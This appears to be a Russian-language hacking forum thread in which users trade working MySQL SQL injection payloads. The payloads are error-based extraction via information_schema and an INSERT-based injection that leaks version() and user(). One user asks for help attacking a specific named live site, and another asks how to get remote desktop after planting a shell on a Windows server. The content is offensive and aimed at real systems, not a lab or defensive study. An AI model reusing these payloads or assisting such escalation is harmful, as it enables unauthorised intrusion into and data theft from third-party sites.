способ великолепен, спасибо, но к сожалению колонка subid INT, поэтому записать левак туда не удастся.

P.S.

попробовал

1' or(1,2)=(select count(*),concat((select concat(table_name,0x3a,column_name) from information_schema.columns where table_schema !=0x696e666f726d6174696f6e5f736368656d61 limit 0,1),0x3a,floor(rand()*2)) from information_schema.columns group by 2 limit 0,1)+'

уже лучше.

MYSQL ERROR:

Operand should contain 1 column(s)

Можно же вывести через duplicate column ?

P.P.S

все решилось

1'+and+(select*from(select+count(*)from(select+1+u nion+select+2+union+select+3)x+group+by+concat(mid ((select+TABLE_NAME+from+INFORMATION_SCHEMA.TABLES +limit+0,1),1,64),floor(rand(0)*2)))z)+and+'1

спасибо FlaktW

@попугай

если мы речь ведем про мускуль имеет место вот такое:

insert into TABLE (id, subid, date, data) values ('666', 'SQL', '1', '1')

insert into TABLE (id, subid, date, data) values ('666', 'SQL',(select concat_ws(0x3a,version(),user()), '2'),('3','3','1','1')

это так сказать в защиту моей теории

values ( скобкой не закрыта

sourcec0de, спасибо! Помоги и этим:

P.S. Сообщение не цитируйте, пожалуйста!

P.P.S. Модеры, не удаляйте это сообщение!

Помогите скуль крутануть. Бред, не получается нихера = \

_http://cs.hz.by/bans/ban_details_ex.php?bhid=16683

Там нету скули. Пропускаются только цифровые значения.

Специально буду цитировать твои сообщения, потому что ты поступаешь не по феншую.

Получил шелл на сайте. ОС системы, где стоит сайт - Windows. Как получить графический доступ? Пытался сувать батник, и запустить его, служба удаленного управления не запускается(

вот код запуска, мб я что-то напутал?

а по моему это все делается через net start